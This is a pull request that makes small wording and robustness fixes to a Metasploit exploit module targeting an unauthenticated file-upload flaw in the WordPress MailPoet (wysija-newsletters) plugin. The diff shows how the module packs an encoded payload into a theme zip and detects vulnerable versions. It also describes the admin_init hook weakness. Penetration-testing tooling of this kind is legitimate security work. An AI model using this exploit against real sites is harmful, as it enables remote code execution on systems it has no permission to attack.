### PR TITLE
Small fixes for the recent WP MailPoet module

### DIFF
--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -13,13 +13,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload',
+      'Name'           => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
       'Description'    => %q{
           The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
-          is vulnerable to an unauthenticated file upload. The exploits uses the upload Theme
+          is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
           functionality to upload a zip file containing the payload. The plugin used the
-          admin_init hook without knowning the hook is also executed for unauthenticated
-          users when calling the right URL.
+          admin_init hook, which is also executed for unauthenticated users when accessing
+          a specific URL.
       },
       'Author'         =>
         [
@@ -46,8 +46,8 @@ class Metasploit3 < Msf::Exploit::Remote
     #  -) Additional files in the folder
 
     content = {
-      File.join(theme_name, 'style.css') => '',
-      File.join(theme_name, payload_name) => payload.encoded
+      ::File.join(theme_name, 'style.css') => '',
+      ::File.join(theme_name, payload_name) => payload.encoded
     }
 
     zip_file = Rex::Zip::Archive.new
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # try to extract version from readme
     # Example line:
     # Stable tag: 2.6.6
-    version = res.body[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
+    version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
 
     # readme present, but no version number
     if version.nil?


### PR DESCRIPTION
- Correct casing in the title
- Anchor the use of ::File
- Force body.to_s since it can be nil in corner cases
